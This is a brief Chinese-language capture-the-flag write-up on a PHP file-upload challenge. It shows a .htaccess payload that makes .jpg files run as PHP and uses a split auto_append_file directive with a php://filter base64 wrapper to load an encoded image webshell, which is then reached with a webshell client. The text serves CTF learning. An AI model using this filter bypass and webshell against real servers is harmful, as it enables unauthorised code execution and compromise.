林深时遇见鹿,海蓝时遇见鲸。
首先先随便上传一个文件,
经测试php相关后缀都不能上传,且<?被过滤。
而且.user.ini里的file也被过滤了
所以只能使用.htaccess了
但是<?被过滤了,所以我们可以使用php伪协议来用base64加密
.htaccess:
AddType application/x-httpd-php .jpg
php_value auto_append_fi\
le "php://filter/convert.base64-decode/resource=1.jpg"
然后蚁剑连接即可。
这题的思路就是用.htaccess,来包含base64后的图片马。